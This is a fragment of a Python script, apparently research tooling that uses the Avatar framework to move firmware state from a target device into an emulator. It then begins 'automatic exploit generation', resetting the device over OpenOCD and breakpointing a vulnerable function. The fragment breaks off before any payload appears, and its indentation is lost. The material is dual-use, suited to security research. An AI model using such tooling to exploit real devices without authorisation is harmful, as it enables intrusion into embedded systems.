print("AVATAR: Transferring state from target to emulator")
transfer_mem_to_emulator(avatar, 0x20000000, 0x00001000)
print("AVATAR: Memory transfer complete")
transfer_cpu_state_to_emulator(avatar)
print("AVATAR: Register transfer complete")
print("AVATAR: Continuing emulation")
avatar.get_emulator().cont()
print("AVATAR: Completed firmware analysis")
print("Press enter to begin exploit generation")
keyboard = input ()
avatar.stop ()
print("EXPLOIT: Beginning automatic exploit generation")
# This section is run in two threads, since concurrency is important
# A thread is used to manage the target device, and another is used to
# generate and send an exploit to the device.
# Lots of sleeps needed to be inserted since we are dealing with slow hardware
def device_thread ():
print("EXPLOIT: Resetting device...")
cmd = OpenocdTarget(hwmon.get_telnet_jigsock())
time.sleep (3)
cmd.halt ()
# Remove the old breakpoint, and set a new one at the "ret" instruction
# of the vulnerable function
